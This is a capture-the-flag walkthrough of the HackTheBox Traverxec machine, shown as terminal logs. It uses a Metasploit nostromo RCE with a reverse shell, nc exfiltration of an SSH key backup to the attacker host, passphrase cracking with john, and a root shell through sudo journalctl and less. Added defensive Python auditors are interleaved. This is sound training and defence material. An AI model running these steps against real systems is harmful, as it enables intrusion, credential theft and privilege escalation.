Traverxec HackTheBox

HackTheBox Traverxec write-up: a walk-through of getting root on this CTF machine. Let's see what we learn on the way to the root # shell. The machine is tagged web and file misconfiguration and is rated Easy on the HTB platform.

The initial Nmap scan reveals two open ports, 22 and 80, on which we then run a more comprehensive scan.

┌──(abhinav㉿ETHICALHACKX)-[~/htb/traverxec]
└─$ nmap -p- --min-rate=1000 -T5 10.10.10.165 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-27 23:29 IST
Nmap scan report for traverxec.htb (10.10.10.165)
Host is up (0.17s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 128.36 seconds
┌──(abhinav㉿ETHICALHACKX)-[~/htb/traverxec]
└─$ sudo nmap -p22,80 -sV -sC -A -O -oN traverxec traverxec.htb 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-27 23:35 IST
Nmap scan report for traverxec.htb (10.10.10.165)
Host is up (0.27s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_  256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open  http    nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.18 (92%), Linux 3.2 - 4.9 (92%), Linux 5.1 (90%), Crestron XPanel control system (90%), Linux 3.16 (89%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   345.11 ms 10.10.14.1
2   345.25 ms traverxec.htb (10.10.10.165)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.23 seconds

The scan shows that the machine is running the nostromo HTTP server 1.9.6 on port 80, serving a web page titled TRAVERXEC.

A quick search for just the name and version reveals an RCE exploit, which can be downloaded here.
However I went to Metasploit, which also has something when you search for nostromo.

┌──(abhinav㉿ETHICALHACKX)-[~/htb/traverxec]
└─$ msfconsole
[!] The following modules could not be loaded!..\
[!] 	/usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/onprem_enum.go
[!] 	/usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/host_id.go
[!] 	/usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/exchange_enum.go
[!] Please see /home/abhinav/.msf4/logs/framework.log for details.

 ______________________________________________________________________________
|                                                                              |
|                   METASPLOIT CYBER MISSILE COMMAND V5                        |
|______________________________________________________________________________|
      \                                  /                      /
       \     .                          /                      /            x
        \                              /                      /
         \                            /          +           /
          \            +             /                      /
           *                        /                      /
                                   /      .               /
    X                             /                      /            X
                                 /                     ###
                                /                     # % #
                               /                       ###
                      .       /
     .                       /      .            *           .
                            /
                           *
                  +                       *

                                       ^
####      __     __     __          #######         __     __     __        ####
####    /    \ /    \ /    \      ###########     /    \ /    \ /    \      ####
################################################################################
################################################################################
# WAVE 5 ######## SCORE 31337 ################################## HIGH FFFFFFFF #
################################################################################
                                                           https://metasploit.com


       =[ metasploit v6.0.53-dev                          ]
+ -- --=[ 2149 exploits - 1143 auxiliary - 366 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]

Metasploit tip: View missing module options with show missing

msf6 > search nostromo

Matching Modules
================

   #  Name                                   Disclosure Date  Rank  Check  Description
   -  ----                                   ---------------  ----  -----  -----------
   0  exploit/multi/http/nostromo_code_exec  2019-10-20       good  Yes    Nostromo Directory Traversal Remote Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/nostromo_code_exec

msf6 > use 0
[*] Using configured payload cmd/unix/reverse_perl
msf6 exploit(multi/http/nostromo_code_exec) > show options

Module options (exploit/multi/http/nostromo_code_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    80               yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic (Unix In-Memory)


msf6 exploit(multi/http/nostromo_code_exec) > set rhosts traverxec.htb
rhosts => traverxec.htb
msf6 exploit(multi/http/nostromo_code_exec) > set lhost tun0
lhost => 10.10.14.8
msf6 exploit(multi/http/nostromo_code_exec) > set lport 7777
lport => 7777
msf6 exploit(multi/http/nostromo_code_exec) > show options

Module options (exploit/multi/http/nostromo_code_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   traverxec.htb    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    80               yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.8       yes       The listen address (an interface may be specified)
   LPORT  7777             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic (Unix In-Memory)


msf6 exploit(multi/http/nostromo_code_exec) > 

Let's run the exploit now to see the magic, and also upgrade to a TTY shell.

msf6 exploit(multi/http/nostromo_code_exec) > run

[*] Started reverse TCP handler on 10.10.14.8:7777 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 2 opened (10.10.14.8:7777 -> 10.10.10.165:44536) at 2021-07-28 00:38:33 +0530

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python -c'import pty;pty.spawn("/bin/bash")'
www-data@traverxec:/usr/bin$ 

Let's find out more with some enumeration, starting with the local users.

www-data@traverxec:/usr/bin$ awk -F: '($3>=1000)&&($1!="nobody"){print $1}' /etc/passwd
< '($3>=1000)&&($1!="nobody"){print $1}' /etc/passwd
david
www-data@traverxec:/usr/bin$ 

There is more to find at /var/nostromo, which contains the config file nhttpd.conf; it tells us the username and the file that holds the password (hash).

www-data@traverxec:/usr/bin$ cd /var
cd /var
www-data@traverxec:/var$ ls
ls
backups  cache	lib  local  lock  log  mail  nostromo  opt  run  spool	tmp
www-data@traverxec:/var$ cd nostromo
cd nostromo
www-data@traverxec:/var/nostromo$ ls
ls
conf  htdocs  icons  logs
www-data@traverxec:/var/nostromo$ cd conf
cd conf
www-data@traverxec:/var/nostromo/conf$ ls
ls
mimes  nhttpd.conf
www-data@traverxec:/var/nostromo/conf$ cat nhttpd.confg
cat nhttpd.confg
cat: nhttpd.confg: No such file or directory
www-data@traverxec:/var/nostromo/conf$ cat nhttpd.conf
cat nhttpd.conf
# MAIN [MANDATORY]

servername		traverxec.htb
serverlisten		*
serveradmin		david@traverxec.htb
serverroot		/var/nostromo
servermimes		conf/mimes
docroot			/var/nostromo/htdocs
docindex		index.html

# LOGS [OPTIONAL]

logpid			logs/nhttpd.pid

# SETUID [RECOMMENDED]

user			www-data

# BASIC AUTHENTICATION [OPTIONAL]

htaccess		.htaccess
htpasswd		/var/nostromo/conf/.htpasswd

# ALIASES [OPTIONAL]

/icons			/var/nostromo/icons

# HOMEDIRS [OPTIONAL]

homedirs		/home
homedirs_public		public_www
www-data@traverxec:/var/nostromo/conf$ 
www-data@traverxec:/var/nostromo/conf$ cat /var/nostromo/conf/.htpasswd
cat /var/nostromo/conf/.htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/
www-data@traverxec:/var/nostromo/conf$ 

The nhttpd.conf file also has a home directory section. Let's dig into these directories.

# HOMEDIRS [OPTIONAL]

homedirs		/home
homedirs_public		public_www

David's home directory itself cannot be listed, but public_www inside it is readable.

www-data@traverxec:/var/nostromo/conf$ ls -la /home
ls -la /home
total 12
drwxr-xr-x  3 root  root  4096 Oct 25  2019 .
drwxr-xr-x 18 root  root  4096 Oct 25  2019 ..
drwx--x--x  5 david david 4096 Oct 25  2019 david
www-data@traverxec:/var/nostromo/conf$ ls -la /home/david/
ls -la /home/david/
ls: cannot open directory '/home/david/': Permission denied
www-data@traverxec:/var/nostromo/conf$ ls -la /home/david/public_www
ls -la /home/david/public_www
total 16
drwxr-xr-x 3 david david 4096 Oct 25  2019 .
drwx--x--x 5 david david 4096 Oct 25  2019 ..
-rw-r--r-- 1 david david  402 Oct 25  2019 index.html
drwxr-xr-x 2 david david 4096 Oct 25  2019 protected-file-area
www-data@traverxec:/var/nostromo/conf$ ls -la /home/david/public_www/protected-file-area
<$ ls -la /home/david/public_www/protected-file-area
total 16
drwxr-xr-x 2 david david 4096 Oct 25  2019 .
drwxr-xr-x 3 david david 4096 Oct 25  2019 ..
-rw-r--r-- 1 david david   45 Oct 25  2019 .htaccess
-rw-r--r-- 1 david david 1915 Oct 25  2019 backup-ssh-identity-files.tgz
www-data@traverxec:/var/nostromo/conf$ 
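To see the misconfiguration from the defender's side, here is an added example (not from the write-up or the nostromo project) that parses the nhttpd.conf directives above and audits both the homedirs exposure and the .htpasswd hash algorithm. It assumes nostromo's standard /~user/ mapping for homedirs, and uses the directive values and the hash line shown on this page as constructed input.

```python
from typing import Dict, List

# Constructed samples: nhttpd.conf directives and the .htpasswd line as shown in the write-up.
NHTTPD_CONF = """\
# MAIN [MANDATORY]
servername\t\ttraverxec.htb
serverroot\t\t/var/nostromo
docroot\t\t\t/var/nostromo/htdocs
# SETUID [RECOMMENDED]
user\t\t\twww-data
# BASIC AUTHENTICATION [OPTIONAL]
htaccess\t\t.htaccess
htpasswd\t\t/var/nostromo/conf/.htpasswd
# ALIASES [OPTIONAL]
/icons\t\t\t/var/nostromo/icons
# HOMEDIRS [OPTIONAL]
homedirs\t\t/home
homedirs_public\t\tpublic_www
"""
HTPASSWD = "david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/\n"


def parse_nhttpd_conf(text: str) -> Dict[str, str]:
    """nhttpd.conf is one 'directive <whitespace> value' per line; '#' starts a comment.
    Directives beginning with '/' are URL aliases and are stored under the key 'alias:<url>'."""
    conf: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split(None, 1)
        if len(parts) != 2:
            continue
        key, value = parts
        conf["alias:" + key if key.startswith("/") else key] = value
    return conf


# crypt(3)-style prefixes; only the first three are slow enough for a web-facing password file.
HASH_ALGOS = {"$2y$": "bcrypt", "$2b$": "bcrypt", "$2a$": "bcrypt", "$6$": "sha512crypt",
              "$5$": "sha256crypt", "$apr1$": "apr1-md5", "$1$": "md5crypt"}
SLOW = {"bcrypt", "sha512crypt", "sha256crypt"}


def audit_htpasswd(text: str) -> List[str]:
    """Flag every user whose stored hash uses a fast (easily cracked) algorithm."""
    findings = []
    for line in text.splitlines():
        if ":" not in line:
            continue
        user, digest = line.split(":", 1)
        algo = next((n for p, n in HASH_ALGOS.items() if digest.startswith(p)), "descrypt/unknown")
        if algo not in SLOW:
            findings.append(f"{user}: {algo} hash is fast to brute-force, rehash with bcrypt")
    return findings


def audit_nhttpd(conf: Dict[str, str]) -> List[str]:
    """Report the settings that widened the attack surface on this box."""
    findings = []
    if "homedirs" in conf:
        sub = conf.get("homedirs_public")
        exposed = f"{conf['homedirs']}/<user>/{sub}" if sub else f"{conf['homedirs']}/<user> (whole home!)"
        findings.append(f"homedirs: /~<user>/ serves {exposed}; anything world-readable there is public")
    if "htpasswd" in conf:
        findings.append(f"htpasswd {conf['htpasswd']} is read by the '{conf.get('user', '?')}' account, "
                        "so any RCE in nhttpd leaks every hash; hash strength is the only protection")
    return findings
```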

Get the file over to our machine via netcat.

www-data@traverxec:/var/nostromo/conf$ id  
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@traverxec:/var/nostromo/conf$ nc 10.10.14.8 9876 < /home/david/public_www/protected-file-area/backup-ssh-identity-files.tgz
<w/protected-file-area/backup-ssh-identity-files.tgz

┌──(abhinav㉿ETHICALHACKX)-[~/htb/traverxec]
└─$ nc -lvp 9876 > backup.tgz
listening on [any] 9876 ...
connect to [10.10.14.8] from traverxec.htb [10.10.10.165] 60010
┌──(abhinav㉿ETHICALHACKX)-[~/htb/traverxec]
└─$ tar -xvf backup.tgz
home/david/.ssh/
home/david/.ssh/authorized_keys
home/david/.ssh/id_rsa
home/david/.ssh/id_rsa.pub

We have a key, which is potentially for the david user. Let's try it.

┌──(abhinav㉿ETHICALHACKX)-[~/htb/traverxec]
└─$ sudo chmod 400 id_rsa
┌──(abhinav㉿ETHICALHACKX)-[~/htb/traverxec]
└─$ ssh -i id_rsa david@traverxec.htb
The authenticity of host 'traverxec.htb (10.10.10.165)' can't be established.
ECDSA key fingerprint is SHA256:CiO/pUMzd+6bHnEhA2rAU30QQiNdWOtkEPtJoXnWzVo.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes

And that asks for a passphrase, so we will have to do more to get there: let's extract the hash from id_rsa and crack it using john.

┌──(abhinav㉿ETHICALHACKX)-[~/htb/traverxec]
└─$ python /usr/share/john/ssh2john.py id_rsa > hash2.txt
┌──(abhinav㉿ETHICALHACKX)-[~/htb/traverxec]
└─$ john --wordlist=../rockyou.txt hash2.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
hunter           (id_rsa)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:13 DONE (2021-07-28 01:24) 0.07183g/s 1030Kp/s 1030Kc/s 1030KC/sa6_123..*7¡Vamos!
Session completed
┌──(abhinav㉿ETHICALHACKX)-[~/htb/traverxec]
└─$ john --show hash2.txt
id_rsa:hunter

1 password hash cracked, 0 left
┌──(abhinav㉿ETHICALHACKX)-[~/htb/traverxec]
└─$ 

Enter the passphrase hunter when ssh-ing as david to traverxec.htb and we are in.

┌──(abhinav㉿ETHICALHACKX)-[~/htb/traverxec]
└─$ ssh -i id_rsa david@traverxec.htb
Enter passphrase for key 'id_rsa': 
Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
david@traverxec:~$ 

We are at a sweet spot now; grab the user flag from user.txt.

david@traverxec:~$ ls
bin  public_www  user.txt
david@traverxec:~$ cat user.txt
7db0b48469606a42cec20750d9782f3d
david@traverxec:~$ 
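Why did the passphrase fall in 13 seconds? john reported the key's KDF as MD5/AES with an iteration count of 1, which is the legacy PEM key format. The following added example (not from the write-up) classifies a private key by how its passphrase is protected, so such keys can be found and regenerated in the bcrypt-based OpenSSH format; the key samples are constructed (headers only), not the key from the box, and the "fewer than 16 bcrypt rounds is weak" threshold is an assumption based on ssh-keygen's default.

```python
import base64
import struct
from typing import Dict, Tuple


def _ssh_string(b: bytes) -> bytes:
    """SSH wire 'string': 4-byte big-endian length followed by the bytes."""
    return struct.pack(">I", len(b)) + b


def _read_string(blob: bytes, off: int) -> Tuple[bytes, int]:
    (n,) = struct.unpack(">I", blob[off:off + 4])
    return blob[off + 4:off + 4 + n], off + 4 + n


def classify_private_key(pem: str) -> Dict[str, object]:
    """Report how (and whether) a private key's passphrase is stretched before use."""
    lines = [l.strip() for l in pem.strip().splitlines()]
    if lines[0] == "-----BEGIN OPENSSH PRIVATE KEY-----":
        blob = base64.b64decode("".join(lines[1:-1]))
        if not blob.startswith(b"openssh-key-v1\x00"):
            raise ValueError("not an openssh-key-v1 blob")
        off = len(b"openssh-key-v1\x00")
        cipher, off = _read_string(blob, off)
        kdf, off = _read_string(blob, off)
        kdfopts, off = _read_string(blob, off)
        rounds = 0
        if kdf == b"bcrypt":  # kdfoptions = string salt, uint32 rounds
            _salt, o = _read_string(kdfopts, 0)
            (rounds,) = struct.unpack(">I", kdfopts[o:o + 4])
        encrypted = cipher != b"none"
        # Assumption: anything below ssh-keygen's default of 16 bcrypt rounds counts as weak.
        return {"format": "openssh-v1", "encrypted": encrypted, "kdf": kdf.decode(),
                "rounds": rounds, "weak": encrypted and (kdf != b"bcrypt" or rounds < 16)}
    # Legacy PEM ("BEGIN RSA PRIVATE KEY"): encryption is announced in the headers and the key
    # is derived with a single MD5 pass (EVP_BytesToKey), which is what john reported above.
    encrypted = any(l.startswith("Proc-Type: 4,ENCRYPTED") for l in lines)
    return {"format": "pem", "encrypted": encrypted, "kdf": "md5" if encrypted else "none",
            "rounds": 1 if encrypted else 0, "weak": encrypted}


def constructed_openssh_key(rounds: int, cipher: bytes = b"aes256-ctr") -> str:
    """Build only the header part of a new-format key (constructed, not a real key) so the
    classifier can be exercised offline; the key material itself is left empty."""
    salt = bytes(range(16))
    blob = (b"openssh-key-v1\x00" + _ssh_string(cipher) + _ssh_string(b"bcrypt")
            + _ssh_string(_ssh_string(salt) + struct.pack(">I", rounds))
            + struct.pack(">I", 1) + _ssh_string(b"") + _ssh_string(b""))
    b64 = base64.b64encode(blob).decode()
    body = "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{body}\n-----END OPENSSH PRIVATE KEY-----\n"


# Constructed legacy sample matching what john reported for the backup's id_rsa
# (MD5/AES, 1 iteration): headers only, the body is filler rather than key material.
LEGACY_ENCRYPTED_PEM = """\
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,000102030405060708090A0B0C0D0E0F

QUJDREVGR0hJSktMTU5PUA==
-----END RSA PRIVATE KEY-----
"""
```

A key that classifies as weak is fixed by re-saving it with `ssh-keygen -p -o -a 16 -f id_rsa`, which rewrites it in the new format with bcrypt rounds.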

Privilege Escalation

We see an interesting entry in david's home, the bin directory, with the following content.

david@traverxec:~$ ls
bin  public_www  user.txt
david@traverxec:~$ cd bin
david@traverxec:~/bin$ ls
server-stats.head  server-stats.sh
david@traverxec:~/bin$ cat server-stats.sh
#!/bin/bash

cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat 
david@traverxec:~/bin$ 

The last line of the script executes journalctl with sudo, which is interesting; let's execute it and see.

david@traverxec:~/bin$ ./server-stats.sh 
                                                                          .----.
                                                              .---------. | == |
   Webserver Statistics and Data                              |.-"""""-.| |----|
         Collection Script                                    ||       || | == |
          (c) David, 2019                                     ||       || |----|
                                                              |'-.....-'| |::::|
                                                              '"")---(""' |___.|
                                                             /:::::::::::\"    "
                                                            /:::=======:::\
                                                        jgs '"""""""""""""' 

Load:  16:06:03 up  2:14,  1 user,  load average: 0.00, 0.00, 0.00
 
Open nhttpd sockets: 0
Files in the docroot: 117
 
Last 5 journal log lines:
-- Logs begin at Tue 2021-07-27 13:51:42 EDT, end at Tue 2021-07-27 16:06:03 EDT. --
Jul 27 13:51:44 traverxec systemd[1]: Starting nostromo nhttpd server...
Jul 27 13:51:44 traverxec systemd[1]: nostromo.service: Can't open PID file /var/nostromo/logs/nhttpd.pid (yet?) after start: No such file or directory
Jul 27 13:51:44 traverxec nhttpd[420]: started
Jul 27 13:51:44 traverxec nhttpd[420]: max. file descriptors = 1040 (cur) / 1040 (max)
Jul 27 13:51:44 traverxec systemd[1]: Started nostromo nhttpd server.
david@traverxec:~/bin$ 

We head to GTFOBins to see if there is anything interesting related to journalctl, and there is.
journalctl invokes the default pager, which is less; less waits for user input after displaying the output, and that can be exploited.

Let us execute /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service [DON'T EXECUTE WHEN THE TERMINAL IS MAXIMIZED; make the terminal window small, so the output does not fit on one screen and less actually stays open].
Just when we execute this, less is waiting for input, where we enter !/bin/bash, and voila! we have a root shell.

david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Tue 2021-07-27 13:51:42 EDT, end at Tue 2021-07-27 16:41:32 EDT
Jul 27 13:51:44 traverxec systemd[1]: Starting nostromo nhttpd server...
Jul 27 13:51:44 traverxec systemd[1]: nostromo.service: Can't open PID file /var
Jul 27 13:51:44 traverxec nhttpd[420]: started
Jul 27 13:51:44 traverxec nhttpd[420]: max. file descriptors = 1040 (cur) / 1040
Jul 27 13:51:44 traverxec systemd[1]: Started nostromo nhttpd server.
lines 1-6/6 (END)
david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Tue 2021-07-27 13:51:42 EDT, end at Tue 2021-07-27 16:41:32 EDT
Jul 27 13:51:44 traverxec systemd[1]: Starting nostromo nhttpd server...
Jul 27 13:51:44 traverxec systemd[1]: nostromo.service: Can't open PID file /var
Jul 27 13:51:44 traverxec nhttpd[420]: started
Jul 27 13:51:44 traverxec nhttpd[420]: max. file descriptors = 1040 (cur) / 1040
Jul 27 13:51:44 traverxec systemd[1]: Started nostromo nhttpd server.
!/bin/bash
root@traverxec:/home/david/bin# 
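From the defender's side the fix is to make sure the command allowed through sudo can never reach a pager. The following is an added example (not part of the write-up) that lints a shell script such as server-stats.sh for sudo-invoked commands that page their output and produces the hardened invocation; the script text is constructed from the lines shown above, and the sudoers rule is assumed to match that exact argument string, so the same flag must be added there.

```python
import shlex
from typing import List, Tuple

# Constructed sample: the relevant lines of david's server-stats.sh as shown above.
SERVER_STATS_SH = """\
#!/bin/bash
cat /home/david/bin/server-stats.head
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat
"""

# Commands that hand their output to $PAGER (less by default, which runs shell commands on "!")
# whenever stdout is a terminal, with the option that disables the pager for each of them.
PAGER_USERS = {"journalctl": "--no-pager", "systemctl": "--no-pager", "git": "--no-pager"}
PAGERS = {"less", "more", "most"}


def sudo_invocations(script: str) -> List[List[str]]:
    """Return the argv of every pipeline segment that starts with sudo (matched by basename)."""
    found = []
    for line in script.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        for segment in line.split("|"):  # crude pipeline split; good enough for a lint
            try:
                argv = shlex.split(segment)
            except ValueError:
                continue  # quotes broken by the split (e.g. a pipe inside backticks): skip
            if argv and argv[0].rsplit("/", 1)[-1] == "sudo":
                found.append(argv)
    return found


def strip_sudo_opts(argv: List[str]) -> List[str]:
    """Drop 'sudo' and its own options to reach the command actually run as root."""
    i = 1
    while i < len(argv) and argv[i].startswith("-"):
        i += 2 if argv[i] in ("-u", "-g", "-p", "-C", "-r", "-t", "-U") else 1  # options with an argument
    return argv[i:]


def audit_sudo_pagers(script: str) -> List[Tuple[str, str, str]]:
    """(command, offending line, fix) for each sudo'd command that can drop into a pager.
    The '| cat' in the script does not help: the sudoers rule permits the bare command,
    and run from a terminal the bare command pages, exactly as shown above."""
    findings = []
    for argv in sudo_invocations(script):
        cmd = strip_sudo_opts(argv)
        if not cmd:
            continue
        name = cmd[0].rsplit("/", 1)[-1]
        if name in PAGERS:
            findings.append((name, " ".join(argv), "a pager as root is a shell as root: remove this rule"))
        elif name in PAGER_USERS and PAGER_USERS[name] not in cmd[1:]:
            fixed = argv[:len(argv) - len(cmd)] + [cmd[0], PAGER_USERS[name]] + cmd[1:]
            findings.append((name, " ".join(argv), " ".join(fixed)))
    return findings
```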

Root Flag.

root@traverxec:/home/david/bin# cd /root
root@traverxec:~# ls
nostromo_1.9.6-1.deb  root.txt
root@traverxec:~# cat root.txt
9aa36a6d76f785dfd320a478f6e0d906
root@traverxec:~# 

Exploitation completed and flags found. What we learnt so far:
– be versed with netcat: listening and transferring files
– enumeration is the key
– nmap to see open ports
– metasploit and the exploit-db database (or searchsploit) to search for exploits
– spawn TTY shells where possible
– search well for known services and read the documentation (here nostromo)
– never ignore ssh keys, id_rsa
– getting the passphrase from an encrypted id_rsa (ssh2john)
– using john / online resources to crack/search the hashes
– privilege escalation via journalctl/less to root
